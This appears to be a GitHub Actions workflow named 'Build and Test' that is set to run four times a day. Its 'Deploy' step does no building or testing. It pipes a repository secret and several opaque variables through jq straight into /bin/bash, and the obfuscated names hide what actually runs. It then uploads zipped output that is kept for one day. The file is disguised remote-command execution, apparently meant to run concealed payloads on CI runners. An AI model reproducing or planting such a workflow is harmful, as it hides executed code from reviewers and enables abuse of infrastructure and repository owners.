name: Build and Test
on:
  workflow_dispatch:

  schedule:
    - cron: '16 0,6,12,18 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  dispatcher:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Deploy
        env:
          ep3: ${{ secrets.ep3 }}
        run: |
          printf '%s' "$ep3" | jq -r .dx5825 | /bin/bash
          printf '%s' "$d47" | jq -r .axgx7 | /bin/bash
          echo $w5990 | jq -r .nx700 | /bin/bash
          echo $v314 | jq -r .wabnd8 | /bin/bash
          printf '%s' "$m6301" | jq -r .a3 | /bin/bash

      - name: Save results
        uses: actions/upload-artifact@v4
        with:
          name: rgexn0N9
          path: "*.zip"
          retention-days: 1
